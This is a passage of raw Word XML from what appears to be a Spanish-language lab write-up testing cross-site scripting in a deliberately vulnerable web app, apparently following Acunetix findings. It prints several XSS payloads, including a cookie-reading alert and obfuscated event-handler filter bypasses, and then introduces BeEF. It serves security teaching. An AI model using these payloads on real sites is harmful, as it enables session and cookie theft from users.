      </w:r>
    </w:p>
    <w:p w14:paraId="38208D98" w14:textId="37EBCCE3" w:rsidR="00A44A52" w:rsidRDefault="00A44A52" w:rsidP="00A44A52">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Esto lo que haría enseñaría un alert con el mensaje i.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1FEE76" w14:textId="40632617" w:rsidR="00225FB4" w:rsidRDefault="00225FB4" w:rsidP="00A44A52">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vamos a probar este </w:t>
      </w:r>
      <w:r w:rsidR="00707993">
        <w:t>ejemplo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en la </w:t>
      </w:r>
      <w:r w:rsidR="00707993">
        <w:t>aplicación web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B92A3B" w14:textId="7188C32F" w:rsidR="00707993" w:rsidRDefault="00707993" w:rsidP="00A44A52">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para esto </w:t>
      </w:r>
      <w:r w:rsidR="00A71047">
        <w:t xml:space="preserve">voy a </w:t>
      </w:r>
      <w:r>
        <w:t>escribir este código en el navegador:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6092ED27" w14:textId="37765606" w:rsidR="00707993" w:rsidRPr="00290DA9" w:rsidRDefault="00707993" w:rsidP="00707993">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707993">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C91766">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91766">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00C91766">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D1D712" w14:textId="0201B1C9" w:rsidR="00707993" w:rsidRPr="00707993" w:rsidRDefault="00707993" w:rsidP="00707993">
      <w:r w:rsidRPr="00290DA9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00290DA9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Lo que hará es mostrar un mensaje con las cookies del usuario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37903CC2" w14:textId="77777777" w:rsidR="00A44A52" w:rsidRPr="00707993" w:rsidRDefault="00A44A52" w:rsidP="00A44A52">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BAFB5B" w14:textId="71E80736" w:rsidR="008B68A9" w:rsidRDefault="00707993" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00707993">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7888B64B" wp14:editId="7E9B4339">
            <wp:extent cx="5400040" cy="290258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902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D69963B" w14:textId="06B539C4" w:rsidR="008C136D" w:rsidRDefault="008C136D" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79445F61" w14:textId="77777777" w:rsidR="008C136D" w:rsidRPr="008C136D" w:rsidRDefault="008C136D" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484C70DA" w14:textId="7DF1DFCA" w:rsidR="008C136D" w:rsidRDefault="008C136D" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EAB3858" w14:textId="58E0D5A0" w:rsidR="009845FC" w:rsidRDefault="00C66975" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este </w:t>
      </w:r>
      <w:r w:rsidR="00DF0ABD">
        <w:t>es el código de protección:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D644BE3" w14:textId="15C51FE9" w:rsidR="00DF0ABD" w:rsidRDefault="00DF0ABD" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF0ABD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F7C67CA" wp14:editId="690A1957">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="268" name="Imagen 2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268" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId191"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4665FCC5" w14:textId="6607A499" w:rsidR="00AB4718" w:rsidRDefault="00AB4718" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E42817C" w14:textId="7A135D19" w:rsidR="003E7A7A" w:rsidRDefault="003E7A7A" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vamos a aprobar ahora en la raíz de la página, en http: IP:8080, usando este paiload </w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘&lt;script/x20type="text/javascript"&gt;javascript:alert(1);&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E78FED" w14:textId="3209B698" w:rsidR="003E7A7A" w:rsidRDefault="003E7A7A" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="003E7A7A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7041963F" wp14:editId="6C6C0ECF">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="198" name="Imagen 19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nterfaz de usuario gráfica, Sitio web&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId192"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AEB0E6" w14:textId="77777777" w:rsidR="001F06BE" w:rsidRDefault="001F06BE" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5795A32C" w14:textId="10253FB9" w:rsidR="003E7A7A" w:rsidRDefault="00A71047" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Por lo </w:t>
      </w:r>
      <w:r w:rsidR="00084B9B">
        <w:t>tanto,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> podemos comprobar que existe una vulnerabilidad en la página </w:t>
      </w:r>
      <w:r w:rsidR="00084B9B">
        <w:t>raíz</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31407C85" w14:textId="431E14CA" w:rsidR="003E7A7A" w:rsidRDefault="003E7A7A" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="003E7A7A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79B4D3AF" wp14:editId="6A1502EC">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="269" name="Imagen 26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descr="Interfaz de usuario gráfica, Aplicación, Word&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId193"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7410694A" w14:textId="34A428E8" w:rsidR="003E7A7A" w:rsidRDefault="003E7A7A" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C20AD9" w14:textId="512D8CF5" w:rsidR="003E7A7A" w:rsidRDefault="003E7A7A" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Podemos comprobar la correcta ejecución </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ataque saliendo el mensaje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25131018" w14:textId="675D3B5D" w:rsidR="00084B9B" w:rsidRDefault="00084B9B" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5D5A1C" w14:textId="11D49E85" w:rsidR="00B605D6" w:rsidRDefault="00084B9B" w:rsidP="00B605D6">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora probaremos en esta URL /snippets.gtl concretamente en el parámetro uid</w:t>
      </w:r>
      <w:r w:rsidR="00B605D6">
        <w:t>, indicada en Acunetix como una vulnerabilidad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBB53AB" w14:textId="5E56CF8B" w:rsidR="00084B9B" w:rsidRDefault="00084B9B" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D748330" w14:textId="79D9D5D3" w:rsidR="00084B9B" w:rsidRDefault="00084B9B" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34ECF691" w14:textId="7A049F75" w:rsidR="00084B9B" w:rsidRDefault="00084B9B" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00084B9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E69CC97" wp14:editId="07BD08BB">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="303" name="Imagen 3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3" descr="Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId194"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E664E2E" w14:textId="55D20C28" w:rsidR="00084B9B" w:rsidRDefault="00084B9B" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76294560" w14:textId="7DC52C8F" w:rsidR="00084B9B" w:rsidRDefault="00084B9B" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Primero probaré con esta p</w:t>
      </w:r>
      <w:r w:rsidR="00857F50">
        <w:t>ai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">load. Que si muevo el ratón saldrá un cuadro de confirmación en pantalla: </w:t>
      </w:r>
      <w:r w:rsidR="00312E63" w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;hTMl%0DOnMOusEOveR%0A=%0A(prompt)``&gt; -&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104B7552" w14:textId="77777777" w:rsidR="001F06BE" w:rsidRDefault="001F06BE" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D4743A" w14:textId="5EB2CA21" w:rsidR="00084B9B" w:rsidRDefault="00084B9B" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00084B9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70C74407" wp14:editId="7D025CE5">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="308" name="Imagen 30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8" descr="Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId195"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C014775" w14:textId="281F0376" w:rsidR="00084B9B" w:rsidRDefault="00084B9B" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D482EF" w14:textId="6FC6DBB4" w:rsidR="00084B9B" w:rsidRDefault="00541862" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora con este: </w:t>
      </w:r>
      <w:r w:rsidR="00312E63" w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;DEtAIls/+/ONToGGLE%0a=%0a[8].find(confirm)// -&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D48CC76" w14:textId="3CD876C7" w:rsidR="00541862" w:rsidRDefault="00541862" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="575174B4" w14:textId="03E0CAFE" w:rsidR="00541862" w:rsidRDefault="00541862" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00541862">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74DEF19B" wp14:editId="6DDE4A99">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="311" name="Imagen 3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descr="Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId196"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D82C0B" w14:textId="4F2E4962" w:rsidR="00541862" w:rsidRDefault="00541862" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC20B72" w14:textId="1CF84ED2" w:rsidR="00541862" w:rsidRDefault="00133957" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Podemos comprobar que también funciona.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF49697" w14:textId="4E4229EC" w:rsidR="008C2073" w:rsidRDefault="008C2073" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4F215E" w14:textId="5B0EF367" w:rsidR="008C2073" w:rsidRDefault="008C2073" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora vamos a mirar en la </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>página</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2073">
        <w:t>deletesnippet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, el parámetro GET </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2073">
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidR="00B605D6">
        <w:t>, indicada en Acunetix como una vulnerabilidad</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D861CDC" w14:textId="7D0E039B" w:rsidR="008C2073" w:rsidRDefault="008C2073" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DAD406E" w14:textId="1EA66CB3" w:rsidR="008C2073" w:rsidRDefault="008C2073" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="008C2073">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DED0340" wp14:editId="52D05DAC">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="312" name="Imagen 31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n 312" descr="Calendario&#10;&#10;Descripción generada automáticamente con confianza media"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId197"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A4C100" w14:textId="588D231F" w:rsidR="008C2073" w:rsidRDefault="008C2073" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39893B7F" w14:textId="0C7ED42E" w:rsidR="008C2073" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Usaré este paiload</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91766">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C91766">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91766">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;htmL%09oNMOuseoveR%09=%09[8].find(confirm)//</w:t>
      </w:r>
      <w:r w:rsidR="00C91766">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B22070" w14:textId="3A9351D0" w:rsidR="00B605D6" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B66C55" w14:textId="5E195C3F" w:rsidR="00B605D6" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00B605D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C8EF6A9" wp14:editId="65E6B0CC">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="313" name="Imagen 3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descr="Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId198"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF4CA6F" w14:textId="0306CD3C" w:rsidR="00B605D6" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FC2028" w14:textId="784EA129" w:rsidR="00B605D6" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Podemos comprobar que es vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B899E32" w14:textId="6986F18D" w:rsidR="00B605D6" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78EDA521" w14:textId="5624950F" w:rsidR="00B605D6" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora probaré con este: </w:t>
      </w:r>
      <w:r w:rsidR="00C91766">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91766">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;a/+/ONmousEovEr%0a=%0a(prompt)``%0dx&gt;v3dm0s -&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00C91766">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178DCF24" w14:textId="365055E5" w:rsidR="00B605D6" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42FC0669" w14:textId="47E6F56E" w:rsidR="00B605D6" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00B605D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D4E0DC" wp14:editId="2A2E28FB">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="314" name="Imagen 3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n 314" descr="Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId199"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02626B69" w14:textId="14BF4495" w:rsidR="00B605D6" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B6CCC5" w14:textId="51E881D7" w:rsidR="00B605D6" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>También vemos que funciona.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC9E6B3" w14:textId="5FA459CF" w:rsidR="00D72515" w:rsidRDefault="00D72515" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1652E9" w14:textId="4DFA1FE6" w:rsidR="00D72515" w:rsidRDefault="00D72515" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para acabar con esta parte voy a probar un programa llamado Beef-xss: </w:t>
      </w:r>
      <w:hyperlink r:id="rId200" w:history="1">
        <w:r w:rsidRPr="00E0472E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.kali.org/tools/beef-xss/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
